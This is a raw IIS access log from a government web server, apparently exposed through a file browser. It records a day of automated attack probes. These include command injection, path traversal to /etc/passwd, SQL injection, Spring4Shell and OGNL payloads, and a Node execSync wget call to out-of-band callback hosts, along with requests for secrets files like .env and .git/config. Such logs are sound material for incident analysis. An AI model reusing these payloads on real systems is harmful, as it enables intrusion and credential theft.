????
Current Path : C:/inetpub/logs/LogFiles/W3SVC18/ |
Current File : C:/inetpub/logs/LogFiles/W3SVC18/u_ex231126.log |
#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 00:21:47 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 00:21:47 103.153.214.94 GET /cgi-bin/downloadFlile.cgi payload=`ls>../2YXBTxNr3wLqchJMKHTDngsRSWY` 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 344 2023-11-26 00:21:47 103.153.214.94 GET /2YXBTxNr3wLqchJMKHTDngsRSWY - 443 - 173.239.196.193 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 312 2023-11-26 00:23:55 103.153.214.94 GET /elfinder/php/connector.minimal.php cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 66 2023-11-26 00:25:07 103.153.214.94 GET /photo/combine.php type=javascript&g=core-r7rules/../../../hello.php. 443 - 173.239.196.199 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 78 2023-11-26 00:35:29 103.153.214.94 GET / class.module.classLoader.resources.context.configFile=http://clf0mb8n3tct4nj5icfgairt7up57x7to.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 99 2023-11-26 00:35:29 103.153.214.94 POST / - 443 - 173.239.196.196 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 68 2023-11-26 00:35:29 103.153.214.94 GET / class.module.classLoader.resources.context.configFile=https://clf0mb8n3tct4nj5icfge1ogmcbechp3r.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 67 2023-11-26 00:35:42 103.153.214.94 GET /mims/updatecustomer.php customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL' 443 - 173.239.196.192 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 65 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 01:14:59 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 01:14:59 103.153.214.94 POST /classes/Master.php f=delete_item 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 364 2023-11-26 01:22:40 103.153.214.94 GET /${@java.lang.Runtime@getRuntime().exec("nslookup+clf0mb8n3tct4nj5icfg648ztfndc36cr.oast.online")}/ - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 290 2023-11-26 01:32:37 103.153.214.94 POST /classes/Master.php f=delete_supplier 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 66 2023-11-26 01:36:33 103.153.214.94 POST /api/agent/tabs/agentData - 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 0 2 2589 2023-11-26 01:39:00 103.153.214.94 POST /api/content/ - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 95 2023-11-26 01:39:00 103.153.214.94 GET /2YXBUhjRqA7SwGJsHOnrW7bPq6Y.jsp - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 66 2023-11-26 01:50:01 103.153.214.94 GET /page id=2YXBUH8vl2O9VpHPoLfdSqqjBtg&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://clf0mb8n3tct4nj5icfg6z3biqfcpy6r3.oast.online%27);s 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 67 2023-11-26 02:01:36 103.153.214.94 GET /logfile d=crossdomain.xml 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 67 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 02:24:30 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 02:24:30 103.153.214.94 GET /dms/admin/accounts/payment_history.php account_id=2%27 443 - 173.239.196.197 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 339 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 02:47:58 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 02:47:58 103.153.214.94 GET /admin/ajax/pages.php id=(sleep(6)) 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 301 0 0 635 2023-11-26 02:49:14 103.153.214.94 POST /app/options.py - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn/app/login.py 405 0 1 74 2023-11-26 02:50:18 103.153.214.94 GET /hms/doctor/ - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 http://bcvt.kontum.gov.vn/hms/doctor/ 200 0 0 176 2023-11-26 02:51:58 103.153.214.94 POST /ztp/cgi-bin/handler - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 68 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 03:15:59 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 03:15:59 103.153.214.94 GET /SAAS/t/_/;/WEB-INF/web.xml - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 389 2023-11-26 03:17:02 103.153.214.94 POST /ccms/index.php - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 73 2023-11-26 03:17:03 103.153.214.94 GET /ccms/dashboard.php - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 66 2023-11-26 03:26:20 103.153.214.94 POST /admin/index.php - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 411 2023-11-26 03:26:21 103.153.214.94 GET /admin/dashboard.php - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 301 0 0 65 2023-11-26 03:26:45 103.153.214.94 GET /dfsms/add-category.php - 443 - 173.239.196.196 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 71 2023-11-26 03:32:44 103.153.214.94 POST /classes/Master.php f=delete_request 443 - 173.239.196.198 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 70 2023-11-26 03:42:48 103.153.214.94 GET /card_scan.php No=123&ReaderNo=`sleep%207`&CardFormatNo=123 443 - 173.239.196.198 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 66 2023-11-26 03:54:29 103.153.214.94 POST /scgi-bin/platform.cgi - 443 - 173.239.196.196 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 69 2023-11-26 03:54:29 103.153.214.94 POST /scgi-bin/platform.cgi - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 66 2023-11-26 03:55:27 103.153.214.94 POST /fileupload/toolsAny - 443 - 173.239.196.199 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 217 2023-11-26 03:55:29 103.153.214.94 GET /authenticationendpoint/2yxbue9ngnkumfocgtjpjodntoz.jsp - 443 - 173.239.196.192 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 65 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 04:14:11 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 04:14:11 103.153.214.94 POST /classes/Master.php f=delete_team 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 67 2023-11-26 04:22:16 103.153.214.94 POST /conf_mail.php - 443 - 173.239.196.198 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 69 2023-11-26 04:31:31 103.153.214.94 POST /classes/Master.php f=delete_inquiry 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 65 2023-11-26 04:42:28 103.153.214.94 GET /cgi-bin-hax/ExportSettings.sh - 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 72 2023-11-26 04:43:48 103.153.214.94 GET /i3geo/exemplos/codemirror.php pagina=../../../../../../../../../../../../../../../../../etc/passwd 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 64 2023-11-26 04:49:06 103.153.214.94 GET / - 443 - 51.81.245.138 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/108.0.0.0+Safari/537.36 - 200 0 0 294 2023-11-26 04:49:09 103.153.214.94 GET /favicon.ico - 443 - 51.81.245.138 python-requests/2.25.1 - 200 0 0 1705 2023-11-26 04:49:15 103.153.214.94 GET / - 443 - 167.71.185.75 - - 200 0 0 275 2023-11-26 04:49:21 103.153.214.94 GET / - 443 - 167.71.185.75 Mozilla/5.0+(Linux;+Android+6.0;+HTC+One+M9+Build/MRA138568)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.1738.98+Mobile+Safari/537.3 - 200 0 64 274 2023-11-26 04:49:23 103.153.214.94 GET /AHT/AHT_UI/config.prod.js - 443 - 167.71.185.75 Go-http-client/1.1 - 200 0 0 273 2023-11-26 04:49:23 103.153.214.94 GET /.vscode/sftp.json - 443 - 167.71.185.75 Go-http-client/1.1 - 200 0 0 273 2023-11-26 04:49:24 103.153.214.94 GET /about - 443 - 167.71.185.75 Go-http-client/1.1 - 200 0 0 273 2023-11-26 04:49:25 103.153.214.94 GET /debug/default/view panel=config 443 - 167.71.185.75 Go-http-client/1.1 - 200 0 0 273 2023-11-26 04:49:26 103.153.214.94 GET /v2/_catalog - 443 - 167.71.185.75 Go-http-client/1.1 - 406 0 0 278 2023-11-26 04:49:26 103.153.214.94 GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application - 443 - 167.71.185.75 Go-http-client/1.1 - 200 0 0 272 2023-11-26 04:49:28 103.153.214.94 GET /server-status - 443 - 167.71.185.75 Go-http-client/1.1 - 200 0 0 273 2023-11-26 04:49:28 103.153.214.94 GET /login.action - 443 - 167.71.185.75 Go-http-client/1.1 - 200 0 0 277 2023-11-26 04:49:29 103.153.214.94 GET /_all_dbs - 443 - 167.71.185.75 Mozilla/5.0+(l9scan/2.0.4393e2431323e2335313e2330313;++https://leakix.net) - 200 0 0 271 2023-11-26 04:49:29 103.153.214.94 GET /.DS_Store - 443 - 167.71.185.75 Go-http-client/1.1 - 200 0 0 274 2023-11-26 04:49:31 103.153.214.94 GET /.env - 443 - 167.71.185.75 Go-http-client/1.1 - 200 0 0 278 2023-11-26 04:49:32 103.153.214.94 GET /.git/config - 443 - 167.71.185.75 Go-http-client/1.1 - 200 0 0 272 2023-11-26 04:49:32 103.153.214.94 GET /s/4393e2431323e2335313e2330313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties - 443 - 167.71.185.75 Go-http-client/1.1 - 200 0 0 274 2023-11-26 04:49:33 103.153.214.94 GET /config.json - 443 - 167.71.185.75 Go-http-client/1.1 - 200 0 0 272 2023-11-26 04:49:34 103.153.214.94 GET /telescope/requests - 443 - 167.71.185.75 Go-http-client/1.1 - 200 0 0 274 2023-11-26 04:49:35 103.153.214.94 GET / rest_route=/wp/v2/users/ 443 - 167.71.185.75 Go-http-client/1.1 - 200 0 0 280 2023-11-26 04:50:07 103.153.214.94 GET / - 443 - 3.124.193.184 Mozilla/5.0+(Linux;+Android+10;+K)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Mobile+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 244 2023-11-26 04:50:07 103.153.214.94 GET /.git/config - 443 - 193.143.1.139 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.198+Safari/537.36 - 200 0 0 243 2023-11-26 04:50:07 103.153.214.94 GET / - 443 - 191.101.31.36 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/119.0 https://bcvt.kontum.gov.vn/ 200 0 0 318 2023-11-26 04:50:08 103.153.214.94 GET / - 443 - 104.129.56.158 Mozilla/5.0+(Linux;+Android+10;+K)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Mobile+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 477 2023-11-26 04:50:08 103.153.214.94 GET / - 443 - 172.111.197.2 Mozilla/5.0+(Linux;+Android+10;+K)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Mobile+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 255 2023-11-26 04:50:08 103.153.214.94 GET /favicon.ico - 443 - 3.124.193.184 Mozilla/5.0+(Linux;+Android+10;+K)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Mobile+Safari/537.36 https://bcvt.kontum.gov.vn/favicon.ico 200 0 0 1276 2023-11-26 04:50:15 103.153.214.94 GET /favicon.ico - 443 - 191.101.31.36 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/119.0 https://bcvt.kontum.gov.vn/favicon.ico 200 0 0 6155 2023-11-26 04:50:17 103.153.214.94 GET / - 443 - 185.65.135.221 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/110.0.0.0+Safari/537.36 - 200 0 0 239 2023-11-26 04:50:17 103.153.214.94 GET /favicon.ico - 443 - 104.129.56.158 Mozilla/5.0+(Linux;+Android+10;+K)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Mobile+Safari/537.36 https://bcvt.kontum.gov.vn/favicon.ico 200 0 0 8056 2023-11-26 04:50:32 103.153.214.94 GET /favicon.ico - 443 - 172.111.197.2 Mozilla/5.0+(Linux;+Android+10;+K)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Mobile+Safari/537.36 https://bcvt.kontum.gov.vn/favicon.ico 200 0 0 21694 2023-11-26 04:50:54 103.153.214.94 POST /hms/doctor/ - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 65 2023-11-26 04:58:00 103.153.214.94 GET /hms/user-login.php - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 http://bcvt.kontum.gov.vn/hms/user-login.php 200 0 0 68 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 05:16:45 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 05:16:45 103.153.214.94 GET / - 443 - 199.45.154.18 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 200 0 0 87 2023-11-26 05:16:45 103.153.214.94 GET /favicon.ico - 443 - 199.45.154.18 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 200 0 64 301 2023-11-26 05:17:36 103.153.214.94 GET /backupsettings.dat - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 65 2023-11-26 05:24:32 103.153.214.94 POST /xmlrpc - 443 - 173.239.196.199 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 63 2023-11-26 05:25:51 103.153.214.94 GET /pfblockerng/www/index.php - 443 - 173.239.196.192 - - 200 0 0 73 2023-11-26 05:26:10 103.153.214.94 POST /webapi/auth - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 65 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 05:46:55 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 05:46:55 103.153.214.94 GET / - 443 - 199.45.154.18 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 200 0 0 89 2023-11-26 05:46:55 103.153.214.94 GET /favicon.ico - 443 - 199.45.154.18 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 200 0 64 411 2023-11-26 05:52:26 103.153.214.94 GET /servlets/OmaDsServlet - 443 - 173.239.196.197 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 http://bcvt.kontum.gov.vn/servlets/OmaDsServlet 200 0 0 66 2023-11-26 06:00:26 103.153.214.94 POST /vendor/htmlawed/htmlawed/htmLawedTest.php - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 68 2023-11-26 06:01:11 103.153.214.94 GET / wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 70 2023-11-26 06:10:58 103.153.214.94 GET / - 443 - 185.242.7.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/119.0 https://bcvt.kontum.gov.vn/ 200 0 0 253 2023-11-26 06:10:59 103.153.214.94 GET / - 443 - 38.95.13.133 Mozilla/5.0+(Linux;+Android+10;+K)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Mobile+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 456 2023-11-26 06:11:00 103.153.214.94 GET / - 443 - 80.67.167.81 Mozilla/5.0+(Android+14;+Mobile;+rv:109.0)+Gecko/119.0+Firefox/119.0 https://bcvt.kontum.gov.vn/ 200 0 0 218 2023-11-26 06:11:06 103.153.214.94 GET / - 443 - 146.190.197.169 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/119.0 https://bcvt.kontum.gov.vn/ 200 0 0 278 2023-11-26 06:11:06 103.153.214.94 GET / - 443 - 185.147.212.18 Mozilla/5.0+(Linux;+Android+10;+K)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Mobile+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 330 2023-11-26 06:11:06 103.153.214.94 GET / - 443 - 146.70.107.13 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+17_1_1+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.1+Mobile/15E148+Safari/604.1 https://bcvt.kontum.gov.vn/ 200 0 0 461 2023-11-26 06:11:08 103.153.214.94 GET / - 443 - 31.6.10.252 Mozilla/5.0+(Linux;+Android+10;+K)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Mobile+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 302 2023-11-26 06:11:10 103.153.214.94 GET /favicon.ico - 443 - 146.190.197.169 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/119.0 https://bcvt.kontum.gov.vn/favicon.ico 200 0 0 1675 2023-11-26 06:11:12 103.153.214.94 GET / - 443 - 103.9.79.233 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/119.0 https://bcvt.kontum.gov.vn/ 200 0 0 845 2023-11-26 06:11:13 103.153.214.94 GET /favicon.ico - 443 - 185.147.212.18 Mozilla/5.0+(Linux;+Android+10;+K)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Mobile+Safari/537.36 https://bcvt.kontum.gov.vn/favicon.ico 200 0 0 4767 2023-11-26 06:11:44 103.153.214.94 GET /favicon.ico - 443 - 146.70.107.13 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+17_1_1+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.1+Mobile/15E148+Safari/604.1 https://bcvt.kontum.gov.vn/favicon.ico 200 0 995 36213 2023-11-26 06:11:44 103.153.214.94 GET /favicon.ico - 443 - 31.6.10.252 Mozilla/5.0+(Linux;+Android+10;+K)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Mobile+Safari/537.36 https://bcvt.kontum.gov.vn/favicon.ico 200 0 0 32202 2023-11-26 06:13:00 103.153.214.94 GET /favicon.ico - 443 - 103.9.79.233 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/119.0 https://bcvt.kontum.gov.vn/favicon.ico 200 0 0 104216 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 06:42:45 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 06:42:45 103.153.214.94 POST /js/jquery_file_upload/server/php/ - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 665 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 07:00:11 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 07:00:11 103.153.214.94 POST /hms/user-login.php - 443 - 173.239.196.198 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 69 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 07:23:56 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 07:23:56 103.153.214.94 POST /configWizard/keyUpload.jsp - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 385 2023-11-26 07:24:06 103.153.214.94 GET / - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 310 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 07:46:11 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 07:46:11 103.153.214.94 POST /controller/ping.php - 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn/controller/ping.php 405 0 1 391 2023-11-26 07:48:02 103.153.214.94 POST /ajax/openvpn/del_ovpncfg.php - 443 - 173.239.196.198 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 66 2023-11-26 07:49:11 103.153.214.94 GET /robots.txt - 443 - 133.242.174.119 Mozilla/5.0+(Linux;+Android+10;+K)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Mobile+Safari/537.36 - 200 0 0 145 2023-11-26 07:49:11 103.153.214.94 GET / - 443 - 133.242.174.119 Mozilla/5.0+(Linux;+Android+10;+K)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Mobile+Safari/537.36 - 200 0 0 402 2023-11-26 07:51:51 103.153.214.94 GET / - 443 - 173.239.196.193 